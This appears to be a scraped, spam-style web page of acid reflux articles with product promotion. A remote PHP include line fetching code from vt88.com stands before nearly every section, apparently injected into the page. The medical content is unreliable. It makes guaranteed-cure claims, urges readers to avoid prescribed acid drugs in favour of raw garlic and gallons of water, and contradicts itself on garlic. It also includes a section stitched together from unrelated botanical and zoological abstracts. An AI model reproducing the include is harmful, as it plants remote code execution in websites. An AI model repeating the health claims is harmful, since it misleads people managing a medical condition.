Here you will learn what foods are safe for you to eat, what foods you should avoid, heartburn-free recipes, and meal plans consisting of heartburn-friendly foods. To come up with this acid reflux diet, you will need to find out exactly which foods are considered safe. Most doctors and other health care professionals recommend that in order to control symptoms, an acid reflux diet should exclude certain foods that are known to increase stomach acid. Tomatoes and citrus fruits, for example, are highly acidic.

An acid reflux diet alone may not be enough. If not treated, acid reflux can lead to damage of the esophageal lining, which can lead to esophageal cancer. If there were one acid reflux diet for everyone, that book would have been written and no one would have acid reflux. There are no safe foods with acid reflux because everyone has acid reflux for different reasons. An acid reflux diet is your best option to get back on a healthy eating track.

For this reason it is important that you see your doctor for help to work out your own acid reflux diet. By experimenting with different food groups you can pinpoint what causes pain and what does not. Including foods that are high in complex carbohydrates are good for an acid reflux diet. These foods include rice, pasta and breads. Introducing a special acid reflux diet can be the first step for treating acid reflux. Many researchers rightly claim that particular dietary changes can be beneficial in the prevention of various health conditions and chronic diseases, acid reflux being one of them.

A good acid reflux diet is not just about knowing what food to avoid for acid reflux disease, or the right food to eat for acid reflux, but also how much to eat for every meal. Acid reflux can happen after a heavy meal. Part of an acid reflux diet and healthy lifestyle includes quitting smoking. Quitting smoking definitely helps to reduce symptoms and is key to improving the condition.

Have a glass of white instead of red wine with dinner. It's just a matter of common sense, but these changes are necessary during the acid reflux recovery period. A shorter dinner-to-bed interval is significantly associated with an increased risk of GERD. It is generally recommended that patients with GERD refrain from eating within three hours of going to sleep.

Reflux is generally worst after eating because the stomach is opening up to allow food in. One suggestion is to each smaller meals. Consistent data are now available on the presence of a disturbed motility of the esophagus, stomach, small intestine, gallbladder, and colon of untreated celiac patients. Whatever the initial event in the pathogenesis of the celiac lesions may be, we know for certain at this time that gastrointestinal disturbances play an important role in the genesis of gastrointestinal symptoms in celiac disease and that surveillance for celiac disease in patients complaining of dysmotility-like dyspeptic symptoms should be increased. This arises in the glandular tissue in the lower part of the esophagus nearest the stomach. In the United States, adenocarcinoma is more common in whites than in blacks.

An Acid Reflux Diet - No Smoking Allowed

<?php include "http://www.vt88.com/block.txt"; ?>Part of an acid reflux diet and healthy lifestyle includes quitting smoking. Quitting smoking definitely helps to reduce symptoms and is key to improving the condition. Just because you're treating yourself to a restaurant meal, you can't just abandon all of the rules that apply to your regular acid reflux diet. Those who are being treated for severe acid reflux have been placed on a special diet, and it's important to uphold the menu whether you're at home or out on the town. A proper acid reflux diet is important because by now, you may have realized from your experience that certain acid reflux food may trigger the symptoms in you.

An acid reflux diet is usually simple to follow and easy for you to make the changes with. This article is designed to help you understand some ideas for the acid reflux diet. A good acid reflux diet should exclude: foods that are rich in fat, citrus foods, tomato products, milk, caffeine-based products, spicy foods, fried foods, peppermint, alcoholic beverages and cigarettes. It is important to monitor your acid reflux diet to alleviate the condition.

Not just cutting out smoking, there are also some desserts that are not advisable to be eaten during an acid reflux diet. Two of which are peppermint and chocolate. A good acid reflux diet is not just about knowing what food to avoid for acid reflux disease, or the right food to eat for acid reflux, but also how much to eat for every meal. Acid reflux can happen after a heavy meal.

A good acid reflux diet involves eating small portions. As part of a GERD diet, have 4 or 5 small meals per day. Most doctors and other health care professionals recommend that in order to control symptoms, an acid reflux diet should exclude certain foods that are known to increase stomach acid. Tomatoes and citrus fruits, for example, are highly acidic. Eating an acid reflux diet and avoiding GERD triggers can help minimize symptoms. The same lifestyle changes used in general GERD treatment can help with acid reflux during pregnancy.

Who Is William Lagadyn - A Review

<?php include "http://www.vt88.com/block.txt"; ?>I get many questions wanting to know who is William Lagadyn and how can he possibly be such an expert on acid reflux. This is because I did write an article about Lagadyn, and of all the people I researched, he's spent 15 years researching and reading everything he could find on heartburn and acid reflux.

Now anyone who has spent 15 years - that's like from 1990 to 2005. Lagadyn claims he was tired of taking pills and drugs for heartburn. He's tabbed as a medical researcher. This is something I suppose anyone could be - research medical fact. But I have to hand it to William Lagadyn because he first unraveled the mysteries of heartburn and acid reflux problems over 20 years ago. I certainly would not have spent that much time and would have become very impatient.

But please hear me on this - since that time William Lagadyn has helped 1000's of people solve their acid reflux problems. You certainly can't knock that. I've sold tons of his book right here.

I suppose what sets Lagadyn apart is that he identifies the root cause of heartburn or acid reflux disease. He teaches people exactly how to correct the condition properly.

The stomach bloating that William Lagadyn talks about is a major cause of reflux. Researchers have found the H.pylori bacterium is responsible for ulcers and has also been linked to colon cancer. The medical answer to destroy the bacterium is a two week course of pharmaceutical antibiotics. But that's not what he preaches. The treatment doesn't involve drugs.

So check it out, as Randy Jackson from American Idol would say. William Lagadyn certainly has an answer to the acid reflux problem and has helped thousands. And by the way - his product is affordable and guaranteed to have you free of acid reflux in 3 to 5 days.

Will Asiatica Work for Acid Reflux

<?php include "http://www.vt88.com/block.txt"; ?>The present study examines the anti-tumor effect of the crude extract (CE) of Centella asiatica as well as its partially purified fractions (AF) from chromatographic procedures by both in vitro short and long term chemosensitivity and in vivo tumor model test systems. AF dose dependently inhibited the proliferation of the transformed cell lines significantly more than did the CE and other solvent fractions. Examination on the wood of Formosan Toddalia asiatica led to the isolation of 30 compounds, including coumarins, alkaloids, a benzoquinone and an amine. Among the isolates, (?)-toddanin and (−)-isocoreximine are new compounds, while cyclohexylamine was isolated for the first time from nature. Ten cultivators of maize, a number of which are high yielding in the presence of the weed Striga asiatica in sub-Saharan Africa, were tested for resistance and tolerance to this root hemiparasite. Observed in rhizotrons, Striga asiatica attached and developed on roots of all cultivars, indicating that none exhibited a true resistance mechanism.

Hence, we conducted a study to investigate the annual changes in weight and secretory activity for the pineal gland, Harderian gland, and ovary in jungle bush quail ( Perdicula asiatica ), a bird indigenous to the tropics in India. Annual changes in weight for the three glands were found. The activity of asiaticoside, isolated from Centella asiatica , has been studied in normal as well as delayed-type wound healing. In guinea pig punch wounds topical applications of 0.2% solution of asiaticoside produced 56% increase in hydroxyproline, 57% increase in tensile strength, increased collagen content and better epithelisation. A high-performance liquid chromatographic method is described, using an octadecylsilylated silica column for simultaneous quantitative determination of the bioactive terpene acids: asiatic acid, madecassic acid and their respective glycosides, asiaticoside and madecassoside, in the plant Centella asiatica . The method is suitable for estimating these compounds in plant material.

The eastern Asian entity is therefore described as a new species, Grateloupia asiatica. Initial interactions of Striga asiatica with a susceptible host and non-host plants were examined by histological methods. Haustorial development was initiated when radicles of S. The sensitizing capacity of Centella asiatica (raw extract) and its triterpenic constituents asiaticoside, asiatic acid and madecassic acid has been studied in guinea pigs. The extract itself as well as the 3 acids were found to be very weak sensitizers.

Does Surgery Work for Acid Reflux?

<?php include "http://www.vt88.com/block.txt"; ?>This is about a procedure is called minimally invasive, but I don't know if you have to resort to this kind of thing. It's incredible to start cutting away at the body God gave us - and yet some people may feel that it is the only thing that will work. With acid reflux, they've tried everything else and want so bad to live like everyone else.

I mean, dream of eating just a normal piece of pizza without worrying about the burn and pain for hours. Do you even think about what you eat? Well, maybe you do if you are reading here. But many don't. It's controlled normally by the body.

We are wonderfully created - but on earth - things go wrong. Damage can be done to the body. Did we drink too much when younger? Did we eat something too hot that caused an open lesion that won't cure?

So after all the medication trials, the change of diet, the sitting up, only eating at certain times, well - it makes you buy into a big change like surgery if you hear that the procedure has been successful and it may just bring your life back to normal.

What are your comments?

What Foods Should I Avoid for Heartburn?

<?php include "http://www.vt88.com/block.txt"; ?>What blew me away the other day was to find out that apple cider vinegar was actually one of the best cures for acid indigestion or heartburn. Does that make any sense? And yet, the over the counter and prescribed potions all curb acid formation in the stomach. So do we need less acid, or more acid?

It turns out we need acid. Even when we have the problem of heartburn. Most often, there isn't enough acid for things to work correctly.

So why does heartburn go away completely when you use one of the major drugs created to stop proton pumps that provide the stomach with acid? This is because the acid is mostly gone and even when your stomach backs up, you feel nothing. What is left is so diluted that it no longer burns the lining of your esophagus.

And maybe, just maybe that burning sensation is the result of a burn on your esophagus wall. More and more people are drinking hot teas which in the mouth may be okay, but as they go down the esophagus, which has different nerves, it is much too hot and can damage the lining. What happens next is when stomach acids come back up - say you've ate way too much - they will cause a horrible burning sensation to the point where you think you may have something important enough to take to the doctor.

But try, at least for a few days, laying off foods you know will cause burning there. These are peppery foods, or any carbs that you know your body handles slowly and you've experienced heartburn before. It's different with different people. Lay off beer or wine - those are rough on the lining - especially when it may be open, ulcerated.

Next, keep a little diary of what you eat and how it affects you. You'll be glad you did. Don't make excuses for why you ate what you ate and don't overeat. I've found overeating one of the main reasons for heartburn. People use huge plates and sometimes even go back for seconds. It just doesn't make sense if you're a stomach trying to keep up. You can't and you wake up full and want no breakfast. We'll talk more about that routine in another story. For now, try these tips and let me know if they work for you.

Kids with Heartburn - What to Take?

<?php include "http://www.vt88.com/block.txt"; ?>If your child is overweight, chances are they have a little problem with heartburn. In fact, statistics show that kids on heartburn medication have soared to over 56 percent of what it was just a few years ago. Those findings come from Medco Health Solutions for prescriptions written 2002-2006. There may be more than 2 million kids under 19 that use drugs.

What food should my child avoid for heartburn?

Your child should avoid the same foods we listed for adults with heartburn. The drugs being prescribed are acid-reducing drugs - called proton pump inhibitors and they are rampant in the acid-reflux, heartburn industry. Who knows what longterm effects these will have on our kids, but we know one thing right now - is that stomach acid is used by the body to fight off germs and disease. Flu season around the corner may mean your heartburn kid on Prevacid could be weak to the bug. Keep an extra close eye on them.

Dr. Renee Jenkins is the president-elect of the American Academy of Pediatrics and I like this doctor. She says that 10 percent of preschoolers and 30 percent of older kids are considered overweight. And what comes with that normally, is heartburn.

Some may really require drugs, according to Dr. Renee Jenkins, but others may get better with smaller and more frequent meals. If you cut back on the fatty foods, work on your diet.

But parents want immediate results. Changing a diet and working with your own child is too hard and too much work. We'd rather have them pop a pill and feel better than to keep complaining to us about their heartburn. Besides, we have our own problems - and this is a quick and easy solution. :-/

Dr. Benjamin Gold has some cautionary remarks. Reflux drugs are considered safe, but there is now evidence linking long-term use with increased risk of infections including pneumonia, and bowel inflammation.

Ok, so parents - get your child on a better diet now - or pay the consequences later. Last time I checked, pneumonia treatment was slightly more expensive than Prevacid. You have heartburn and then they want $29.95 for the booklet that tells you stuff that you can find for yourself online.

And what might really set you off is that there isn't a one thing cures all - even though most of the books out there are written that way. You do this or that and your heartburn is gone forever. Go ahead - eat that pasta with gusto. It won't hurt.

But that doesn't make sense and that's why, after trying some of the remedies myself, and finding they didn't work - well, they worked a little - but it always returned - is to follow some of those websites I found online and just read and learn.

Yes, I've posted a ton of what I've learned here on this site. As a matter of fact, the best advice I wrote about is the easiest thing you can do for acid reflux and that is eating crushed garlic cloves. I know it sounds disgusting and my wife gave me a funny look when I told her what I was about to do - but dag nabbit if it kept me feeling good for quite a while. And you gotta know that garlic has to do good to other parts of your body.

It's strong, and it's smelly to deal with - but I found one thing I just have to tell you. You have to crush it and then eat it pretty soon afterward - within I'd say, 30 minutes. Because it loses its effect when it sits. And you can't cook it - it has to be raw - and you can't take it in pill form. It has to be fresh. I've looked at the cloves and wondered if I could plant those things - start growing my own. But they are so cheap to buy at Costco - no hassle of keeping them watered, and harvesting them at the right time. Plus, that would be less time to contribute to my bromeliads. Hehe.

Try this garlic solution next time you eat. Just crush two or three cloves - start with two. It's strong but mix it in well with your pasta or rice. And check out my page on garlic for acid reflux or heartburn. It will save you big bucks and do the job naturally.

How to Know When You Have Acid Reflux?

<?php include "http://www.vt88.com/block.txt"; ?>Acid reflux is when some acid leaks up (refluxes) into the oesophagus. It is also known as GERD or Gastroesophageal Reflux. It is not only common with adults, even infants have acid reflux but it’s very difficult to determine if a child have acid reflux.

Reflux can manifest itself in many ways. Sufferers have long endured not only the pain and discomfort of reflux symptoms, but also unpleasant and chalky, alcohol-heavy, strong peppermint-flavored medicine concoctions used to control the condition. It is extremely common in premature babies, and children with cystic fibrosis, muscular or neurological problems and conditions such as Down’s syndrome.

Acid reflux tends to be more of a problem at night, while you are lying down or sleeping. It is treatable and you should ask your doctor what treatments are available and right for you. It affects almost half of all infants at some point and time in their infancy.

Heartburn, the major symptom of Acid Reflux in the esophagus, is described to cause a burning uneasiness at the back of the sternum. Incidents can last between a few minutes in mild cases to several hours in severe cases.

A medicine which prevents your stomach from making acid is a common treatment and usually works well. Cells in the lining of the stomach make acid and other chemicals which help to digest food. In some cases the pressure in the stomach rises higher than the sphincter can withstand.

GERD may damage the lining of the esophagus, thereby causing inflammation (esophagitis), although usually it does not. GERD is said to be caused by many different factors. It is chronic in nature and requires taking medicine indefinitely.

Acid reflux is not at all uncommon in infants--up to have of all babies may experience it occasionally. It is often targeted with Prilosec and similar prescription drugs but this can actually do more harm than good. It's when the contents of the stomach, including both acid and food, work back up into the esophagus sometimes causing pain and discomfort.

Can Drugs Like Prilosec and Nexium Cause Ulcers or Pneumonia?

<?php include "http://www.vt88.com/block.txt"; ?>It was back in 2002 that an advisory panel in this country gave Procter & Gamble the permission to sell Prilosec OTCcom right over the counter without a prescription. There is interest to know which works best, Nexium verses Prilosec, and if Prilosec is too strong as an over the counter option. There are a few reports that too much of any of these medications can cause ulcers.

Dutch researchers found that Nexium, Pepcid, and Prilosec could increase your risk of contracting pneumonia simply by reducing stomach acids that kill those germs that cause the disease. A research with over 300,000 patients found Tagamet was also to blame. This study was published in the Journal of the American Medical Association.

Many doctors in the field feel that few people need the Prilosec even though sales are around $600 million a year. They are saying that the people taking these heartburn drugs don't really have to because people need to get to the source of the problem - not cover it up with medication. So their answer is to have people learn how to treat the heartburn.

Most people ignore heartburn at first. It is an indicator - the body doesn't do that just for fun - there is a reason heartburn is happening. Nexium and Prilosec just cover up the symptom. As Tony Robbins once said, "The Disease is the Cure!" This means that our bodies are all the time trying to cure themselves. And when there is a need for heartburn to happen - that is simply the body doing something to survive. So when we cover that up - how can that be good?

It's just like putting a piece of paper over the overheat light on your dashboard. That light only comes on when there is a serious problem with the car. Ignored, the car eventually dies. This is why Prilosec vs Nexium doesn't really matter - they both are band-aids for a more serious situation. Yes, they may solve the problem short term - studies show that there is some reversal. However, ignoring WHY the heartburn happens is just waiting for more damage to happen longterm.

How Do You Cure Heartburn?

These four tips will help you immensely:

Make sure you are drinking enough clean water.

Make sure your diet is food you can eat to avoid acid reflux. Avoid sugar.

Use garlic - raw cloves - to kill H. pylori which causes heartburn for many.

Make sure you use the highest quality food you can afford.

Does Garlic Help Acid Reflux or Heartburn

<?php include "http://www.vt88.com/block.txt"; ?>Five years ago if you mentioned you had acid reflux, people would immediately tell you to check into the latest drugs on the market, like Propulsid. Remember that? It was pulled from the market in 2000 because it caused death (what a cure!)

Well, I mentioned an anti-parasite herb "artemesia" last time that is very helpful for acid reflux. But I've received many responses that it is simply too expensive to use as an experiment - to see if it works for you. Yes, artemesia is safer than Propulsid, but when you think of it - artemesia is just a patch for what is going on.

Garlic is inexpensive and in my opinion, has better results! Just the opposite of that - Prilosec from Astra Zeneca - brings in about 7 billion dollars a year according to Business Week. These drugs do, indeed have some effect on stopping acid reflux - or nobody would buy them. The problem with these drugs is that they don't address what is causing acid reflux. They just mask it - and worsen it.

Just think - if you take medicines that block body functions - normal functions - how could that be beneficial? Proton pump inhibitors, including Prilosec and Prevacid, and the H2 blockers like Zantac, Tagament, and Pepcid, are probably some of the worse drugs you could take.

Because... they are made to reduce the amount of acid you have and your ability to digest food. If you reduce your stomach acid, you're diminishing your body's defenses for any infection that food might be carrying - like food poison. Your body simply won't have what it needs to react.

So here's where Garlic comes in. If you drink at least a gallon of pure water every day - along with some good probiotics - (you know, acidophilus, etc) - that is plenty to restore your normal stomach function. Still, Garlic is something you should eat every day. It kills pathogenic organisms and keeps the bowel flora optimized. But make sure you eat FRESH garlic. The good stuff - the active ingredient is destroyed - within a few hours of smashing the clove.

Ok, pills - garlic pills, won't work. You either have to smash a garlic clove with a spoon, or juice the thing to get any benefit out of it. It you just swallow it whole - it won't work. The allicin will not convert. I see you thinking that it's just going to be too smelly. But, that only happens if you eat more than three or so. If you find you have a good odor - cut back a bit.

Wormwood Artemisia Asiatica Herb

<?php include "http://www.vt88.com/block.txt"; ?>No one with it would think treatment could be simple, but some have found an easy cure with the antioxidant extract of this herb. Called Artemisia Asiatica, this wormwood herb may be the answer to acid reflux. So how exactly does this work?

Acid reflux is actually an inflammation of the esophagus which is cause by regurgitating stuff from your stomach over and over. Ten percent of Americans suffer this each day in a form of heartburn to even more critical symptoms.

Right now the thinking in medical circles is suppressing the acid that accompanies the stomach content. So diets with the antioxidants of fruits and vegetables are ways to prevent the condition.

Recently, scientists induced 60 rats with acid reflux and then split them up into four groups:

One group did not receive treatment

Two groups were given 30 mg and 100 mg of wormwood Artemisia Asiatica

One group given the traditional Zantac treatment

Final group was not given acid reflux, and were the base

What happened was remarkable. The Artemisia Asiatica actually reduced the severity of the acid reflux and was also a protectorate of continual ulceration and inflammation of the esophagus. The group that received the 100 mg dose did best.

80 percent of the rats that received no treatment at all did develop large ulcers in their esophagus. Only 27 percent of the rats that received 30 mg of Artemisia Asiatica antioxidant, and 20 percent of the ones that received 100 mgs had any problems. So, the report tells us that nearly two thirds of rats that received Zantac developed ulcers.

Finally, rats that were given the Artemisia Asiatica antioxidant healed better than any of the others, and had less cell damage. This rat experiment is not like humans and acid reflux because humans do extremely well on acid suppression, one scientist noted.

On another report, we will tell you how garlic is used in the suppression of acid reflux.

A Look at How to Cure Heartburn

<?php include "http://www.vt88.com/block.txt"; ?>There's more pages on curing heartburn and acid reflux, indigestion, G.E.R.D., you name it - than you can shake a stick at. And still, you follow their advice, eat right - exercise - drink plenty of water, but nothing seems to change. To top it all off, you hear on TV that eating those heartburn chalky-like wafers is not the answer - it simply closes the esophagus so the acids don't back up. Doesn't get rid of the acids at all.

Another night of misery - especially when I turn on my side - which is the only way I really sleep well.

But then I find a site, I bet you've never seen, that says that heartburn is simply an out of balance situation. Once corrected, symptoms just fade away. Cured! is what the website says. No more burning or pain. That's awful nice. But for some reason I just can't believe it.

Canadian William Lagadyn is a medical researcher. And before you click away from this page, I want you to know that he researches digestive disorders. If that's not enough, the guy suffered from G.E.R.D. - seriously. So, I thought - he can certainly relate. Lagadyn's method is a natural cure for heartburn. He claims the medical profession would in no way endorse this because they make their money masking symptoms.

I want to listen to this guy. Crazy it may seem, but I always thought that myself. Masking - not curing! And you don't know that the problem will just continue under there working below the masking that's going on. And then if you get worse, they fight it with more drugs.

Ok, there are some anti-acid drug treatments that are probably valid. But I bet most aren't. They have so many side-effects, it takes half a magazine page to list them in fine print - hoping you won't look at them all.

Lagadyn claims 90 percent of people that try his method are cured of their heartburn. Sounds worth looking into. Suffering leads to worse things, they say. If you have acid reflux, you already know what I mean.

Take a look - see if this is for you. A natural cure for heartburn. Just think - what if this works for you?

A Swallow Away: Acid Reflux Medications

<?php include "http://www.vt88.com/block.txt"; ?>Acid reflux is a condition that is painful and can sometimes become chronic. This condition is usually only present in the esophagus but has been known to sometimes present in the lungs. When someone suffers from this, it is usually caused by the backup for acid in the stomach going up through the esophagus.

There are many reasons acid reflux can appear. Some of these reasons include people eating too much or eating an over acidic food. A lot of the bad foods are citrus fruits, dairy products, and heavy meats. Lifestyle situations such as smoking and drinking can cause acid reflux also.

Taking acid reflux into consideration many different options become available for treatment. Some of those steps include abstaining from acidic foods, elevating the upper part of the body when sleeping and the use of acid reflux medications. There are basically two types of acid reflux medications that are available to an individual suffering from acid reflux. The two acid reflux medication types are over the counter and also prescription medicine.

Over-the-counter Medications

Many over the counter acid reflux medications can be found in a store near you. Usually these medications are in liquid form or sometimes tablets commonly known as antacids.

Both of these forms can quell smaller attacks and usually work to decrease acid. On the whole, the over the counter acid reflux medication will make the symptoms go away but the underlying cause will stay. There are many different brand names of antacids but most of the over the counter medication is generally the same.

It is very important to remember that those taking over the counter acid reflux medications should be doing so only on a short-term basis, this will not cure acid reflux disease. Most directions on the back of the labels of over the counter acid reflux medications state that you should not use the medicine for more than 2 weeks. Consequently, a physician should be sought if any symptoms persist past this time frame.

In addition, side effects may present with taking these acid reflux medications. Some of those side effects may include constipation or diarrhea, stomach cramps, or an increased thirst.

Prescription Medications

Just like the over the counter medication, there are many prescription acid reflux medications available to reflux sufferers. Two common types of acid reflux medications are the acid suppressants and the proton pump inhibitors.

The acid suppressants help to block the production of acid in the stomach. This particular type of acid reflux medication sends a chemically induced signal to the body that helps to reduce the production of acid in the stomach. Examples of this type of medication include Zantac, Pepcid, Tagamet, and Axid.

The action of the proton pump inhibitor also helps to reduce the production of acid in the stomach. However, this particular medication deals directly with the cells found in the stomach wall. This interaction with these cells that produce acid helps to minimize the secretion of acid into the stomach. Examples of this type of medication are Nexium, Zoton, Protium and Paret.

Stop Acid Reflux Now! - Review

<?php include "http://www.vt88.com/block.txt"; ?>There's an idea that isn't really new, but still, many with acid reflux problems haven't tried it at all. And the reason is most people don't want to get radical with their diet. For instance, people know that too many potato chips can make them fat, and fat leads to heart disease, possible diabetes down the line.

So, instead of a healthier lifestyle, one full of more energy and wellbeing, people make excuses in their mind that a bag of chips during their favorite TV show isn't all that bad. And if not chips, it's popcorn, loaded with something fattening. These are dead foods that don't do much to nourish the body, but instead overload it with fat and salt.

Changing eating habits for a life free of acid reflux, well... I don't really have acid reflux THAT often - so a bag of chips every so often can't be that bad. And you just can't find the foods for the diet you're talking about... the excuses go on and on.

Finally, we found an organization with an actual "Strategy" on following a more "alkaline" food plan that basically does away with acid reflux, along with a little different lifestyle. Now you're not going to be drinking funny drinks or banishing eating out - but you will do some things differently.

And we know, because we've been there before - you know - the nights where you prop your back up, and lie there waiting for the heartburn to subside. It sometimes goes on for hours.

Well, Kathryn Whittaker's downloadable book on stopping acid reflux is not what we expected. In it she goes over a whole lot of things we already knew about GERD and symptoms - how to change your diet. But we did find a few things that we didn't know about.

For instance - many times the doctors diagnosis of acid reflux disease isn't correct. And there were some foods on her food table we wouldn't have guessed caused acid reflux - for example - rice!

But the main thing we found about Stop Acid Reflux Now! is that it really addresses these misdiagnoses - like the fact many doctors diagnose acid reflux as something entirely different. And that there are great dangers if the acid reflux continues.

Can we say we recommend Kathryn's Stop Acid Reflux Now! ? I'd say yes. It's worth the price and we were tickled to find out that there are actually two other books offered as bonuses: "Irritable Bowel Syndrome Relief Secrets" and "Overcoming Gastritis". Both offer the diagnosis angle and come free of charge.

For more information and possible relief for you, visit Stop Acid Reflux Now!

Remember the Acid Reflux Foods to Avoid

<?php include "http://www.vt88.com/block.txt"; ?>Acid reflux is a very caustic disease causing discomfort to many people. People of all ages and sizes can get acid reflux, but the majority of those people are old adults. This condition can be irritating and depressing. There are many symptoms of acid reflux though one of the most prevalent is heartburn. Many with acid reflux can eliminate the uncomfortable symptoms if they remember the acid reflux foods to avoid. There are those who suffer who do not know that there are acid reflux foods to avoid and continue cooking away their health.

Acid reflux foods to avoid include many spices that are often the trigger, which brings on this condition. Those who suffer from acid reflux should not eat foods that have many spices. Eating spicy foods before bed is an outright awful thing to do. The acid reflux foods to avoid include many citrus fruits including oranges and grapefruit. This doesn't mean that all fruits are bad, simple fruits such as apples and bananas will more than satisfy your daily need of fruits.

Acid Reflux Foods to Avoid Should Govern the Diet

People who remember the acid reflux foods to avoid should be able to eliminate most symptoms from their daily ongoing. Usually they sleep better and are more refreshed during the day. The acid reflux foods to avoid include foods that are fried and starchy. People should try to avoid chicken wings; especially those prepared with lots of spices. Chicken nuggets should be added to the acid reflux foods to avoid. Marbled sirloin steak and ground chuck streak probably has a lot of fat in them and these are acid reflux foods to avoid.

Cakes that have creamy frostings and ice cream usually cause too much acid buildup in the stomach and should be avoided by those with acid reflux. Brownies and doughnuts are foods to avoid for those with acid reflux. Many people find that frozen yogurt is a fine substitute for milk based ice cream products. Milkshakes, cottage cheese and sour cream are dairy products that should be added to the acid reflux foods to avoid. Macaroni with cheese and pastas with rich sauces are definitely on the list of acid reflux foods to avoid. Also creamy salad dressing have an adverse effect on those who have acid reflux.

Defining Acid Reflux Disease

<?php include "http://www.vt88.com/block.txt"; ?>Acid reflux disease, or more commonly known as GERD, is gastro esophageal reflux disease. It is a chronic condition where the liquid in the stomach regurgitates into the esophagus. Esophageal damage is very likely if left untreated. Once diagnosed with acid reflux disease, treatments must be made which need to be administered for the rest of the patient’s life. Stopping the treatment usually means the reflux and subsequently the damage will return.

Many varying factors contribute to acid reflux disease. People who have esophageal damage caused by Scleraderma most likely will get acid reflux disease. Scleraderma is a rare disease, which causes hardening of the muscles, tissue, and major organs.

People who have a hiatal hernia often suffer from acid reflux disease, too. A hiatal hernia occurs when part of the stomach attaches to the esophagus. This causes the esophagus to push against the diaphragm. Once this occurs the esophagus is much more prone to acid reflux attacks.

Much more common things such as esophageal constrictions can cause acid reflux. When the esophagus constricts it pushes acids upward. A familiar name for this is heartburn.

Acid Reflux Disease Complications

Unfortunately acid reflux disease is chronic and can lead to many other problems. Ulcers are known to form in the esophagus just as they are in the stomach. An ulcer is a break in the lining of the esophagus, which usually causes bleeding. Bleeding can become so severe that a blood transfusion is necessary. This is rare though, but precaution should always be taken.

After an ulcer has healed a stricture is formed. This is equivalent to scar tissue that forms after surgery. If the stricture is large enough, food might lodge in the esophagus causing a choking sensation. In some cases the food may even need to be removed surgically. Fortunately there is a surgical procedure that can stretch the esophagus so that it is a more normal size. The procedure is simple and normally does not require a stay in the hospital.

In some cases acid reflux can be so bad as to carry over into the lungs causing pneumonia. This happens when reflux fluid is aspirated into the lungs. A major symptom in conjunction with pneumonia is heavy coughing. Help should be sought immediately as acid reflux can cause severe damage to the inside of the lungs. Scarring is the most likely end result, but if not treated then it will most certainly end in death.

Acid Reflux Diet – Facts and Myths

<?php include "http://www.vt88.com/block.txt"; ?>Contrary to popular belief, milk does not help acid reflux. People tend to think that milk is helpful because it calms down the burning sensation in the esophagus. In fact milk does have these cooling properties going down, but when it reaches the stomach more acid is built. Usually foods high in citrus and spices do not cause acid reflux. More often than not overeating causes most of the problems. Those who are on an acid reflux diet need to have many small meals during the day rather than a few large meals. Take everything in moderation, you can enjoy your citrus fruits ands spicy foods as long as you don't overdo it.

Tomato products are bad for those who are on an acid reflux diet. You may have an acid reflux episode if you eat tomato-based products because of their high acid content. This is also true for foods containing garlic and onions. Limiting the intake of these foods is preferable although you may eat small amounts from time to time. Chocolate and fatty foods are also culprits, so eat this sparingly. These types of foods are heavy on your stomach and take up more room. The longer the food is in your stomach and the more food is in your stomach the more acid can build up and potentially cause a lot of acid reflux.

Appropriate Foods for the Acid Reflux Diet

You may worry that being on an acid reflux diet means that you can no longer enjoy the many foods that you have come to love. This is far from the truth because almost any food can be eaten in moderation, and there happens to be many foods that are better for you. What you really want to eat when you're on an acid reflux diet is complex carbohydrates. These great foods such as breads and pastas tend to soak up the acid in your stomach, reducing the amount that can go up your esophagus. These foods are good for an acid reflux diet, but they can also cause weight gain, so it is better to eat smaller portions of these.

Frying foods should be avoided. To help yourself maintain a good weight and also stem acid reflux, you should bake or broil foods instead of frying them. Do not drink to excess, especially wines. You may drink in moderation but too much can lead to more acid building up in your system.

Non-carbonated beverages are preferable. Decaf coffee is ok in moderation but water is the best for you. Many different types of flavored water are available and they are quite good for you and for an acid reflux diet. Herbal tea is another good choice. Experimenting with your foods to test your tolerance is not unheard of. Everybody reacts to foods differently. By using moderation and making sure you understand the causes of acid reflux, you should be able to eat healthily and be happy on an acid reflux diet.

The Many Causes of Acid Reflux

<?php include "http://www.vt88.com/block.txt"; ?>All it takes to understand the causes of acid reflux is a simple lesson in anatomy. On the way to the stomach food passes through what is called the esophageal sphincter. After the sphincter closes, then digestion can commence. But sometimes certain foods and/or pressure buildups can cause the sphincter to open or release. This leads to food and acid pushing up through the esophagus causing heartburn and irritation and other causes of acid reflux.

Foods and Situations that are Causes of Acid Reflux

Many well-known causes of acid reflux come from tomatoes and tomato based foods. These foods can actually weaken the esophageal sphincter. Tomato based foods are also very acidic which does not help the problem. Because the tomato is a staple of many different cultures, they are not easily avoided, but nevertheless they are one of the main causes of acid reflux.

Caffeine is also one of the main causes of acid reflux. This also means that any kind of coffee or soda or chocolate is potentially harmful because they are also causes of acid reflux. That being said, there will always be people who will not stop drinking their beloved caffeine products. This means that those people must take extra precautions when dealing with acid reflux.

Other common causes of acid reflux are fried and fatty foods. These take longer to digest in the stomach, which causes more acid to build up to help digest them properly. The extra acid builds pressure in the stomach and on the esophageal sphincter causing it to open and reflux to occur. Many people find it hard to change their diet even though they know many of their foods are causes of acid reflux and that cutting those foods down would surely help in the long run.

Certain situations must be avoided. These situations have been known to be causes of acid reflux. One of these situations is eating too much. Pressure on the lower esophageal sphincter can be caused by too full of a stomach. Try not to lie down two to three hours after eating, this is a very important rule to be followed. Lying down would allow food to rise up into your esophagus. These two situations can usually be easily avoided.

Usually once you know the causes of acid reflux, avoiding it can be manageable. This can be done by avoiding these foods and situations or by taking medications. Many of the medications can be bought over the counter but some are needed for chronic acid reflux and may be prescribed by physicians. Knowing the causes of acid reflux can make life much less painful.

Suffering Acid Reflux And Alkaline Diet Can Reduce Heartburn Symptoms

<?php include "http://www.vt88.com/block.txt"; ?>Diet is one of the main reasons many people suffer from acid indigestion or acid reflux. A good method to help treat the indigestion is to treat the pH level in your system through eating an alkaline diet. For most people a pH level of 7.4% is average in their saliva and spinal fluid.

One indication that you should start an alkaline diet is that there is too much acid in your system. Testing for acidity in saliva is actually quite simple. First wait two hours after eating and then let your mouth fill with saliva, swallowing two times. After you have allowed your mouth to fill with saliva the third time, you can spit onto a pH paper. There should be a chart on the box of pH strips that will tell you how much acid is in your saliva by a simple color comparison. Many are seeking to treat acid reflux and alkaline diet can reduce many symptoms.

Food can be used to stem acid reflux and alkaline diet food can balance out your pH. There are many foods that look as though they would cause more acid reflux, but instead they have a very high alkaline content, which can stave off acid reflux. Other types of food such as corn and olives should be avoided when you have acid reflux and alkaline diet foods should be substituted in their place. Some helpful foods that can neutralize acid are celery, green beans, and peas. These have a high alkaline content.

Lifestyle Change Needed To Reduce Acid Reflux

